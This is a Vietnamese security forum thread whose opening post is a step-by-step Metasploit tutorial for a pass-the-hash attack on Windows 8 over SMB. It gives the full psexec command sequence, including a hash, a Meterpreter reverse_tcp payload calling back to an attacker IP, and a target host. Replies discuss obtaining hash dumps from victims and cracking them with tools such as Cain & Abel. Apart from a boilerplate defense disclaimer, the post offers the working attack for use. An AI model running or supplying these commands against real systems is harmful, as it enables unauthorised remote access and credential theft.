Tấn công Windows 8 qua SMB service sử dụng Hash Password

DDos

DDos

VIP Members
22/10/2013
524
2.191 bài viết
Tấn công Windows 8 qua SMB service sử dụng Hash Password
DDos
Sử dụng một password hash dump trước khi bạn nhận được kết nối từ xa tới máy tính nạn nhân sử dụng SMB PSEXEC.

Code:

#msfconsole
msf > use windows/smb/psexec
msf exploit(psexec) > set smbuser Lk
msf exploit(psexec) > set smbpass e52cac67419a9a224a3b108f3fa6cb6d
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set lhost 192.168.10.129
msf exploit(psexec) > set lport 1122
msf exploit(psexec) > set rhost 10.10.2.2
msf exploit(psexec) > exploit

- Chạy metasploit:

1.png

- Payload & Exploit:

2.png

- Meterpreter Session đã được mở:

3.png
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
V
Re: Tấn công Windows 8 qua SMB service sử dụng Hash Password

cho e hỏi là cái password hash dump lấy đâu ra thế
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
DDos
Re: Tấn công Windows 8 qua SMB service sử dụng Hash Password

vipkute2703;10194 đã viết:
cho e hỏi là cái password hash dump lấy đâu ra thế
Nhấn để mở rộng...
Lấy từ máy tính mục tiêu bằng một cách nào đó... :D
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
V
Re: Tấn công Windows 8 qua SMB service sử dụng Hash Password

Thế thì kug như nhau. z là mình phải tiếp cận đc với máy mục tiêu trước ah
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
X
Re: Tấn công Windows 8 qua SMB service sử dụng Hash Password

Cái này nói cụ thể hơn thì là pivoting, trong một hệ thống mạng nội bộ, các máy tính sử dụng cùng một password.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
T
Re: Tấn công Windows 8 qua SMB service sử dụng Hash Password

Anh cho e hỏi e lấy được pass hashdump rồi thì cần phải có những gì mới có thể crack pas được ? Em dùng findmyhash hay icrack online đều không được.
Anh giúp em với.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
DDos
Re: Tấn công Windows 8 qua SMB service sử dụng Hash Password

tiendatdtvt;17718 đã viết:
Anh cho e hỏi e lấy được pass hashdump rồi thì cần phải có những gì mới có thể crack pas được ? Em dùng findmyhash hay icrack online đều không được.
Anh giúp em với.
Nhấn để mở rộng...
bạn muốn tìm ra mật khẩu dạng cleartext à?
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
T
Re: Tấn công Windows 8 qua SMB service sử dụng Hash Password

DDos;17727 đã viết:
bạn muốn tìm ra mật khẩu dạng cleartext à?
Nhấn để mở rộng...
E tấn công lấy được pass hash giờ dùng gì để giải mã đó ra cleartext ạ ?
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
nktung
Re: Tấn công Windows 8 qua SMB service sử dụng Hash Password

tiendatdtvt;17817 đã viết:
E tấn công lấy được pass hash giờ dùng gì để giải mã đó ra cleartext ạ ?
Nhấn để mở rộng...
Bạn có thể sử dụng các Tool giải mã, ví dụ tính năng Crack Passwork trong Cain&Albel. Tuy nhiên việc giải mã có thành công hay không phụ thuộc rất nhiều yếu tố. Ví dụ độ mạnh của password, việc bạn đoán được mật khẩu có bao nhiêu ký tự, khả năng có những ký tự gì v.v
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
T
Re: Tấn công Windows 8 qua SMB service sử dụng Hash Password

Bài chia sẽ của bạn rất ý nghĩa
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bạn phải đăng nhập hoặc đăng ký để phản hồi tại đây.
Bài viết liên quan
  • Khám phá BadUSB - Kỹ thuật tấn công mới và cách bảo vệ chính mình
  • [Nghi ngờ] Máy in sân bay tân sơn nhất bị tấn công
  • Giúp tấn công web tự động bán account
  • GDB: Tăng tốc debug bằng script
  • Các cách tấn công xâm nhập trong LAN
    • Thẻ
    hash password smb service windows 8
    Bên trên